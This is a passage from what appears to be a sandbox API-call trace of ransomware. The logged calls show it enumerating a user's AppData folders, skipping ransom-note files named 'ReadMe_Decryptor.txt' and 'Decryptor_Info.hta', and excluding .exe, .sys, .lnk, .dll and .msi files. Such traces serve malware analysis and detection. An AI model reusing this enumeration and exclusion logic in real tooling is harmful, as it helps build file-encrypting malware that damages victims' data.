lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0084.222] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0084.222] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x94fde710, ftLastAccessTime.dwHighDateTime=0x1d2fab5, ftLastWriteTime.dwLowDateTime=0x94fde710, ftLastWriteTime.dwHighDateTime=0x1d2fab5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0084.222] lstrcmpW (lpString1="PrivacIE", lpString2=".") returned 1 [0084.222] lstrcmpW (lpString1="PrivacIE", lpString2="..") returned 1 [0084.222] lstrlenW (lpString="PrivacIE") returned 8 [0084.222] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="PrivacIE" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE" [0084.222] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" [0084.222] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 73 [0084.222] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0084.223] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.223] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x94fde710, ftLastAccessTime.dwHighDateTime=0x1d2fab5, ftLastWriteTime.dwLowDateTime=0x94fde710, ftLastWriteTime.dwHighDateTime=0x1d2fab5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.223] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.223] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.224] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x94fde710, ftCreationTime.dwHighDateTime=0x1d2fab5, ftLastAccessTime.dwLowDateTime=0x94fde710, ftLastAccessTime.dwHighDateTime=0x1d2fab5, ftLastWriteTime.dwLowDateTime=0x2bc126f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0084.224] lstrcmpW (lpString1="index.dat", lpString2=".") returned 1 [0084.224] lstrcmpW (lpString1="index.dat", lpString2="..") returned 1 [0084.224] lstrcmpiW (lpString1="index.dat", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.224] lstrcmpiW (lpString1="index.dat", lpString2="Decryptor_Info.hta") returned 1 [0084.224] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0084.224] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0084.224] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0084.224] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0084.224] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0084.224] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0084.224] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x50fa8bb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x50fa8bb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0084.224] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0084.224] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0084.224] lstrlenW (lpString="Low") returned 3 [0084.224] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="Low" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low" [0084.224] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" [0084.224] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 77 [0084.224] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0084.225] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.225] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x50fa8bb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x50fa8bb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.225] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.225] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.225] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x50fa8bb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x50fa8bb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbaf619f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0084.225] lstrcmpW (lpString1="index.dat", lpString2=".") returned 1 [0084.225] lstrcmpW (lpString1="index.dat", lpString2="..") returned 1 [0084.225] lstrcmpiW (lpString1="index.dat", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.225] lstrcmpiW (lpString1="index.dat", lpString2="Decryptor_Info.hta") returned 1 [0084.225] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0084.225] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0084.225] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0084.226] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0084.226] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0084.226] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0084.226] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x50fa8bb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x50fa8bb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbaf619f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0084.226] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0084.226] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x50fa8bb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x50fa8bb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbaf619f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0084.226] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0084.226] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe512a320, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe512a320, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0084.226] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0084.226] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0084.226] lstrlenW (lpString="Recent") returned 6 [0084.226] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent" [0084.226] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" [0084.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 71 [0084.227] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0084.227] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.227] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe512a320, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe512a320, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.569] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.569] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.569] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c1b460, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4c1b460, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4c1b460, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1461, dwReserved0=0x0, dwReserved1=0x0, cFileName="-5q nCE70OT2nZ.lnk", cAlternateFileName="-5QNCE~1.LNK")) returned 1 [0084.569] lstrcmpW (lpString1="-5q nCE70OT2nZ.lnk", lpString2=".") returned 1 [0084.569] lstrcmpW (lpString1="-5q nCE70OT2nZ.lnk", lpString2="..") returned 1 [0084.569] lstrcmpiW (lpString1="-5q nCE70OT2nZ.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.569] lstrcmpiW (lpString1="-5q nCE70OT2nZ.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.569] PathFindExtensionW (pszPath="-5q nCE70OT2nZ.lnk") returned=".lnk" [0084.569] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.569] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.569] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.569] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf858e40, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xdf858e40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdf858e40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x2b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="-_sk4.lnk", cAlternateFileName="")) returned 1 [0084.569] lstrcmpW (lpString1="-_sk4.lnk", lpString2=".") returned 1 [0084.569] lstrcmpW (lpString1="-_sk4.lnk", lpString2="..") returned 1 [0084.569] lstrcmpiW (lpString1="-_sk4.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.569] lstrcmpiW (lpString1="-_sk4.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.569] PathFindExtensionW (pszPath="-_sk4.lnk") returned=".lnk" [0084.569] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.569] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.570] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.570] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4674020, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4674020, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4674020, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="03g4_AE.lnk", cAlternateFileName="")) returned 1 [0084.570] lstrcmpW (lpString1="03g4_AE.lnk", lpString2=".") returned 1 [0084.570] lstrcmpW (lpString1="03g4_AE.lnk", lpString2="..") returned 1 [0084.570] lstrcmpiW (lpString1="03g4_AE.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.570] lstrcmpiW (lpString1="03g4_AE.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.570] PathFindExtensionW (pszPath="03g4_AE.lnk") returned=".lnk" [0084.570] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.570] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.570] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.570] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4816f40, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4816f40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4816f40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf86, dwReserved0=0x0, dwReserved1=0x0, cFileName="06rdYfvBodXUjBi7cG.lnk", cAlternateFileName="06RDYF~1.LNK")) returned 1 [0084.570] lstrcmpW (lpString1="06rdYfvBodXUjBi7cG.lnk", lpString2=".") returned 1 [0084.570] lstrcmpW (lpString1="06rdYfvBodXUjBi7cG.lnk", lpString2="..") returned 1 [0084.570] lstrcmpiW (lpString1="06rdYfvBodXUjBi7cG.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.570] lstrcmpiW (lpString1="06rdYfvBodXUjBi7cG.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.570] PathFindExtensionW (pszPath="06rdYfvBodXUjBi7cG.lnk") returned=".lnk" [0084.570] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.570] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.570] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.570] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4d4bf60, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4d4bf60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4d4bf60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x3f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="1fGwisp8jCt.lnk", cAlternateFileName="1FGWIS~1.LNK")) returned 1 [0084.571] lstrcmpW (lpString1="1fGwisp8jCt.lnk", lpString2=".") returned 1 [0084.571] lstrcmpW (lpString1="1fGwisp8jCt.lnk", lpString2="..") returned 1 [0084.571] lstrcmpiW (lpString1="1fGwisp8jCt.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.571] lstrcmpiW (lpString1="1fGwisp8jCt.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.571] PathFindExtensionW (pszPath="1fGwisp8jCt.lnk") returned=".lnk" [0084.571] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.571] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.571] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.571] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe43ec8c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe43ec8c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe43ec8c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf05, dwReserved0=0x0, dwReserved1=0x0, cFileName="2s5KpdIemv.mkv.lnk", cAlternateFileName="2S5KPD~1.LNK")) returned 1 [0084.571] lstrcmpW (lpString1="2s5KpdIemv.mkv.lnk", lpString2=".") returned 1 [0084.571] lstrcmpW (lpString1="2s5KpdIemv.mkv.lnk", lpString2="..") returned 1 [0084.571] lstrcmpiW (lpString1="2s5KpdIemv.mkv.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.571] lstrcmpiW (lpString1="2s5KpdIemv.mkv.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.571] PathFindExtensionW (pszPath="2s5KpdIemv.mkv.lnk") returned=".lnk" [0084.571] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.571] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.571] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.572] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2f64b00, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe2f64b00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe2f64b00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf92, dwReserved0=0x0, dwReserved1=0x0, cFileName="3nTcP-ngLyWYYU9_.lnk", cAlternateFileName="3NTCP-~1.LNK")) returned 1 [0084.572] lstrcmpW (lpString1="3nTcP-ngLyWYYU9_.lnk", lpString2=".") returned 1 [0084.572] lstrcmpW (lpString1="3nTcP-ngLyWYYU9_.lnk", lpString2="..") returned 1 [0084.572] lstrcmpiW (lpString1="3nTcP-ngLyWYYU9_.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.572] lstrcmpiW (lpString1="3nTcP-ngLyWYYU9_.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.572] PathFindExtensionW (pszPath="3nTcP-ngLyWYYU9_.lnk") returned=".lnk" [0084.572] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.572] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.572] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.572] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4b5cd80, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4bcf1a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4bcf1a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1edd, dwReserved0=0x0, dwReserved1=0x0, cFileName="4egQ3W.lnk", cAlternateFileName="")) returned 1 [0084.572] lstrcmpW (lpString1="4egQ3W.lnk", lpString2=".") returned 1 [0084.572] lstrcmpW (lpString1="4egQ3W.lnk", lpString2="..") returned 1 [0084.572] lstrcmpiW (lpString1="4egQ3W.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.572] lstrcmpiW (lpString1="4egQ3W.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.572] PathFindExtensionW (pszPath="4egQ3W.lnk") returned=".lnk" [0084.573] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.573] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.573] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.573] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32123c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe32123c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe32123c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1997, dwReserved0=0x0, dwReserved1=0x0, cFileName="52FjfcR9Co.lnk", cAlternateFileName="52FJFC~1.LNK")) returned 1 [0084.573] lstrcmpW (lpString1="52FjfcR9Co.lnk", lpString2=".") returned 1 [0084.573] lstrcmpW (lpString1="52FjfcR9Co.lnk", lpString2="..") returned 1 [0084.573] lstrcmpiW (lpString1="52FjfcR9Co.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.573] lstrcmpiW (lpString1="52FjfcR9Co.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.573] PathFindExtensionW (pszPath="52FjfcR9Co.lnk") returned=".lnk" [0084.573] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.573] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.573] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.573] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4fad560, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4fad560, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4fad560, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="5nkry1zWlBf7L.lnk", cAlternateFileName="5NKRY1~1.LNK")) returned 1 [0084.573] lstrcmpW (lpString1="5nkry1zWlBf7L.lnk", lpString2=".") returned 1 [0084.573] lstrcmpW (lpString1="5nkry1zWlBf7L.lnk", lpString2="..") returned 1 [0084.573] lstrcmpiW (lpString1="5nkry1zWlBf7L.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.573] lstrcmpiW (lpString1="5nkry1zWlBf7L.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.573] PathFindExtensionW (pszPath="5nkry1zWlBf7L.lnk") returned=".lnk" [0084.574] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.574] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.574] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.574] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe331cd60, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe49dffc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe49dffc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xe32, dwReserved0=0x0, dwReserved1=0x0, cFileName="5_nm_.lnk", cAlternateFileName="")) returned 1 [0084.574] lstrcmpW (lpString1="5_nm_.lnk", lpString2=".") returned 1 [0084.574] lstrcmpW (lpString1="5_nm_.lnk", lpString2="..") returned 1 [0084.574] lstrcmpiW (lpString1="5_nm_.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.574] lstrcmpiW (lpString1="5_nm_.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.574] PathFindExtensionW (pszPath="5_nm_.lnk") returned=".lnk" [0084.574] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.574] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.574] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.574] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4cb39e0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4cb39e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4cb39e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1a0d, dwReserved0=0x0, dwReserved1=0x0, 